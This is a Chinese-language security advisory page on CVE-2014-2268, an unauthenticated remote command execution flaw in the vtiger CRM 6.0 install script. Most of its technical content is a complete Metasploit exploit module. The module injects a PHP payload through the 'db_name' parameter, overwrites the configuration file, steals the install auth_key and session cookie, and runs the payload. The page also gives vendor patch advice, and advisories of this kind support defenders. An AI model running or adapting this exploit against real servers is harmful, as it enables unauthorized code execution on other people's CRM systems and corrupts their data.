Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / vtiger CRM远程代码执行漏洞

发布日期:2014-04-10
更新日期:2014-04-15受影响系统:
vtiger vtiger CRM 6.0
 vtiger vtiger CRM
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 66758
 CVE(CAN) ID: CVE-2014-2268
 
vtiger CRM是免费的开源客户关系管理软件。
 
vtiger CRM 6.0及其他版本的安装脚本内存在任意命令执行漏洞,未经身份验证的攻击者经"db_name"参数提交到index.php脚本的输入如果没有被有效过滤,即可触发此漏洞,使远程攻击者可以执行任意命令。
 
<*来源:Jonathan
 
 链接:http://www.exploit-db.com/exploits/32794/
       http://osvdb.org/show/osvdb/105641
 *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ## require "msf/core" class Metasploit3 < Msf::Exploit::Remote # Application database configuration is overwritten
 Rank = ManualRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {})
   super(update_info(info,
     "Name"         => "Vtiger Install Unauthenticated Remote Command Execution",
     "Description"    => %q{
       This module exploits an arbitrary command execution vulnerability in the
       Vtiger install script. This module is set to ManualRanking due to this
       module overwriting the target database configuration, which may result in
       a broken web app, and you may not be able to get a session again.
     },
     "Author"       =>
       [
         "Jonathan Borgeaud < research[at]navixia.com >" # Navixia Research Team
       ],
     "License"        => MSF_LICENSE,
     "References"   =>
       [
         [ "CVE", "2014-2268" ],
         [ "URL", "https://www.navixia.com/blog/entry/navixia-find-critical-vulnerabilities-in-vtiger-crm-cve-2014-2268-cve-2014-2269.html"],
         [ "URL", "http://vtiger-crm.2324883.n4.nabble.com/Vtigercrm-developers-IMP-forgot-password-and-re-installation-security-fix-tt9786.html"],       ],
     "Privileged"   => false,
     "Platform"     => ["php"],
     "Payload"        =>
       {
         "Space"     => 4000,
         "BadChars"    => "#",
         "DisableNops" => true,
         "Keys"        => ["php"]
       },
     "Arch"         => ARCH_PHP,
     "Targets"        => [[ "Vtiger 6.0.0 or older", { }]],
     "DisclosureDate" => "Mar 5 2014",
     "DefaultTarget"  => 0))     register_options(
       [
         OptString.new("TARGETURI", [true, "The base path to Vtiger", "/"])
       ], self.class)
 end def exploit
   print_status("Injecting payload...")
   rand_arg = Rex::Text.rand_text_hex(10)
   res = send_request_cgi({
     "method" => "GET",
     "uri"      => normalize_uri(target_uri.path, "index.php"),
     "headers"  => {"X-Requested-With" => rand_text_alpha(5)},
     "vars_get" => {
         "module"  => "Install",
         "view"    => "Index",
         "mode"    => "Step5",
         "db_name" => "127.0.0.1"; if(isset($_GET["#{rand_arg}"])){ #{payload.encoded} } // "
     }})   # Check timeout
   if not res
     print_error("Request timed out, please try again")
     return
   end   if res.body =~ /name="auth_key"s+value=".*?((?:[a-z0-9]*))"/i
     authkey = $1
     phpsessid = res.get_cookies     if authkey.blank?
       print_error("No AuthKey found")
       return
     elsif phpsessid.blank?
       print_error("No PHP Session ID found")
       return
     end     print_status("Retrieved Authkey : #{authkey}")
     print_status("Retrieved PHPSESSID : #{phpsessid}")     send_request_cgi({
       "method"   => "GET",
         "uri"      => normalize_uri(target_uri.path, "index.php"),
         "headers"  => {"X-Requested-With" => rand_text_alpha(5)},
         "cookie" => phpsessid,
         "vars_get" =>
           {
             "module" => "Install",
             "view"   => "Index",
             "mode"   => "Step7",
             "auth_key" => authkey
           }
       })       print_status("Executing payload...")
       send_request_cgi({
         "method"    => "GET",
         "uri"     => normalize_uri(target_uri.path, "config.inc.php"),
         "vars_get"  => { rand_arg => "1" }
       })
   else
     print_error("No auth_key pattern found")
   end
 end
 end建议:
--------------------------------------------------------------------------------
厂商补丁:
 
vtiger
 ------
 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 
http://vtiger-crm.2324883.n4.nabble.com/Vtigercrm-developers-IMP-forgot-password-and-re-installation-security-fix-tt9786.htmlF5 ARX Series NTP拒绝服务及GnuTLS欺骗漏洞Adobe Reader for Android多个任意代码执行漏洞相关资讯      vtiger CRM 
  • Vtiger CRM modules/Users/actions  (08月02日)
  • vtiger CRM <= 5.4.0 (SOAP服务)多  (08/04/2013 07:30:20)
  • vtiger CRM "vtigerolservice.php"  (08/04/2013 07:29:08)
  • vtiger CRM密码重置安全限制绕过漏  (04/15/2014 19:17:40)
  • vtiger CRM "customerportal.php"  (08/04/2013 07:29:53)
  • vtiger CRM "validateSession()"   (08/04/2013 07:28:20)
本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款